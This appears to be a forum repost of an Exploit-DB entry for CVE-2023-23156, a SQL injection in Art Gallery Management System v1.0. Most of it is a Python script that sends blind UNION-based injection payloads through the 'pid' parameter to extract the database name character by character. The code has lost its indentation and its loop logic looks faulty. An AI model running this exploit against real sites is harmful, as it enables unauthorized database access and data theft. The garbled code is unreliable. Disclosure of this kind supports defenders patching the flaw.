- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 51272
- Проверка EDB
-
- Пройдено
- Автор
- YOGESH VERMA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2023-23156
- Дата публикации
- 2023-04-06
Art Gallery Management System Project in PHP v 1.0 - SQL injection
Код:
# Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
# Date: 31-01-2023
# Exploit Author: Yogesh Verma
# Vendor Homepage: https://y0gesh-verma.github.io/
# Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
# Version: 1.0
# Tested on: Windows/Linux
# CVE : CVE-2023-23156
#!/usr/bin/python
import sys
import requests
tmp = requests.Session()
db_name = ""
database = ""
if len(sys.argv) == 2:
url = sys.argv[1]
for i in range(1, 7):
for j in range(32, 126):
sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
data = {'pid': '-1' + sql_payload}
r = tmp.get(url, params=data)
if "Dimension : 1" in r.text:
db_name += chr(j)
database += db_name
if len(db_name)>1:
print('\n'+"Fetching current database :")
print(database)
print('\n'+"vulnerable to CVE-2023-23156")
else:
print("Not vulnerable to CVE-2023-23156")
else:
print("Error: Please provide the URL as an argument.")
print("Example: script.py https://example.com/single-product.php")
- Источник
- www.exploit-db.com